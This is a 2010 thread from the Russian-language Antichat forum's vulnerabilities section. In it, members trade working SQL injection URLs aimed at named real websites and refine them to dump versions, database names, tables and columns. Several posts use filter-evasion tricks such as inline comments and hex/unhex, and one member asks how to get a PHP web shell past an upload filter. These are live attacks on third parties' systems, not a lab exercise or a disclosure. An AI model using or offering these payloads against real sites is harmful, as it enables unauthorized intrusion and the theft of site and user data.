HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.06.2010, 19:00
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

30 % что зальёться .htaccess Т.к. если он уже php режет, это уже значит фильтрация.

// o_OPS Теория фильтрации fail. 30 %

И 95 % что сам .htaccess проканает. Т.к. не всегда .htaccess

Да и кто знает, мб там .htaccess лежит :O

Кстате DSU, IceAngel_ прав, если даже .htaccess в главной сказал мол jpg текст, то он в своей уже удаляет это правило, и создаёт новое.

Последний раз редактировалось Ctacok; 01.06.2010 в 19:54..
 
Ответить с цитированием

  #2  
Старый 02.06.2010, 03:01
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

Цитата:
Цитата:
Сообщение от [ DSU ]
Это лиш в том случае если хтакцесса нет в корне где уже описаны правила обработки интерпретатором...

Сомневаюсь. Можно пример такого .htaccess`а ?

З.Ы.
Заранее прошу обратить внимание на директиву RemoveHandler в моем примере.
я думаю он имел ввиду, что может не хватить прав на перезапись хтаксеса, если он там уже лежит
 
Ответить с цитированием

  #3  
Старый 02.06.2010, 16:41
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

http://www.mibf.ru/index.php?id=23+union+select+0,1,2,3,4,5,6,7,8,9
pomoqite raskrutit skul
 
Ответить с цитированием

  #4  
Старый 02.06.2010, 17:03
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами: 9610572

Репутация: 32
По умолчанию

Цитата:
Сообщение от LokbatanLi  
http://www.mibf.ru/index.php?id=23+union+select+0,1,2,3,4,5,6,7,8,9
pomoqite raskrutit skul
пока получилась только слепая инъекция:

http://www.mibf.ru/index.php?id=23+and+substring(version(),1,1)=5--+
 
Ответить с цитированием

  #5  
Старый 02.06.2010, 17:28
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

LokbatanLi
Если девятое поле не числовое отрабатывает редирект, а потом в урле вывод
http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),null,10/*

v1d0qz
Специально поставил хекс\анхекс ибо на въетнамском сайте у него дальше 99% начнутся проблемы с кодировкой, он опять придёт сюда с вопросом, и опять подарит мне "воу, большое!". А зачем мне два больших "воу", сам подумай? Я с одним-то не знаю что теперь делать
 
Ответить с цитированием

  #6  
Старый 02.06.2010, 20:12
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

http://www.armeniafund.org/press_releases/press_releases.php?id=-234+union+select+0,1,2,3,4,5,6

version()-4.0.27

mysql.user-net access

vot tolko nasel table_name-login nu ne moqu ne kak nayti column_name//

esli mojno pomoqite pojalusta//

i pomoymu bil sposob mojno nayti v 4 vetke column_name esli znaem table_name//
nu ne znayuk kak eto bil i qde 4ital..
pomoqite..
 
Ответить с цитированием

  #7  
Старый 02.06.2010, 20:16
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

Цитата:
всё он верно сделал. Просто там несколько запросов http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Ver sion()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
а как насчет вывод таблиц (information_schema.tables фильтруется) там тоже фильтруется....
можно и так

http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
 
Ответить с цитированием

  #8  
Старый 02.06.2010, 20:38
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Заливаю шелл shell.php, shell.php.doc, shell.php.txt

выводит такую ошибку

Wrong field content:

File - allowed file extensions are PDF, PPT, PPS, DOC, XLS, TXT, HTM, HTML, GIF, JPG, RAR, ZIP

Как еще можно попробывать залить шелл?

Заранее всем спасибо!
 
Ответить с цитированием

  #9  
Старый 02.06.2010, 21:01
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Цитата:
Сообщение от Iceangel_  
попробуй shell.php.xls
Не проходит.
 
Ответить с цитированием

  #10  
Старый 02.06.2010, 21:07
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от pinch  
а как насчет вывод таблиц (information_schema.tables фильтруется) там тоже фильтруется....
можно и так

http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/select+1,2,UNHEX(HEX(concat_ws(0x3a,table_schema,t able_name,column_name))),4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33/**/from/**/information_schema.columns+limit+1,1--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.